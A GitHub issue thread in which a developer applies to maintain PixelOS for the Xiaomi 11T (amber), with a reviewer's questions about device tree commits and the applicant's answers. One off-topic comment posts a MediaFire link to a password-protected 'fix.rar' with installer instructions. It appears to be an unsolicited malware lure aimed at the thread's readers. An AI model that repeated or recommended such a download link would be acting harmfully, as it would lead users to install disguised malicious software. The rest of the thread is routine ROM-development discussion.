### ISSUE TITLE
New maintainer

### ISSUE THREAD

**Issue by ziadtamer11** [PixelOS-AOSP/official_devices#411]
```
Xiaomi 11T (amber)
```

## Device Tree sources
```
https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber
https://github.com/xiaomi-mt6893-dev/android_kernel_xiaomi_amber-prebuilt
https://github.com/xiaomi-mt6893-dev/android_vendor_xiaomi_amber
```

## What ROM's do you maintain officially/unofficially
```
LineageOS (unofficial)
crDroid (official)
```

## How long have you been building Custom ROMs
```
two years
```

## Any Exceptions/special concern?
```
No
```

## List of changes/patches applied to source, if any
```
No
```

### Telegram username
```
ziad_tamer_a
```

### Link to your XDA thread of unofficial build
```
https://xdaforums.com/t/rom-14-unofficial-pixelos-aosp-stable-agate-amber-30-05-2024.4675873/
```

### Link to your unofficial PixelOS Build Post other than XDA
```
https://t.me/Mi11TUpdates/35
```

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sarthakroy2002** [comment]
Hey, So I was reviewing your tree, 

First thing is, PixelOS Bringup is missing.

Also Clear few doubts:

1. https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/a9b8345d977567f2a3da4adf7ff56a027864426d - Why was c2.mtk.hevc.decoder dropped?

2. https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/5aeab0f73d9abdd86fe09352e8f2b776fe105fdc - Isnt there any way the device detects itself that which encryption to use? Also Does Xiaomi ship both mitee and beanpod on amber?

3. https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/f078956946e0cb6b8f684949f5e6678b13ed286f - Whynot move completely to erofs?

4. Xiaomi didn't release amber's kernel sources?

**Comment by ziadtamer11** [comment]
> Hey, So I was reviewing your tree,
> 
> First thing is, PixelOS Bringup is missing.
> 
> Also Clear few doubts:
> 
> 1. [xiaomi-mt6893-dev/android_device_xiaomi_amber@a9b8345](https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/a9b8345d977567f2a3da4adf7ff56a027864426d) - Why was c2.mtk.hevc.decoder dropped?
> 2. [xiaomi-mt6893-dev/android_device_xiaomi_amber@5aeab0f](https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/5aeab0f73d9abdd86fe09352e8f2b776fe105fdc) - Isnt there any way the device detects itself that which encryption to use? Also Does Xiaomi ship both mitee and beanpod on amber?
> 3. [xiaomi-mt6893-dev/android_device_xiaomi_amber@f078956](https://github.com/xiaomi-mt6893-dev/android_device_xiaomi_amber/commit/f078956946e0cb6b8f684949f5e6678b13ed286f) - Whynot move completely to erofs?
> 4. Xiaomi didn't release amber's kernel sources?


pixelOS bring up should be done when pushing the trees on pixelOS organization isn't it? bring up takes one min

1. we were facing some media decoding issues like some social apps weren't working well after QPR2 but all are fixed and that commit is reverted after moving to HyperOS blobs
2. no need for detecting anything since we have only one variant and it boots with beanpod, Xiaomi has already dropped mitee with HyperOS but i did that earlier
3. they released 4.14 sources but has a broken USB driver so had to switch to prebuilt 4.19 for now

**Comment by kawaaii** [comment]
Apply again after PixelOS 15 Stable Release.
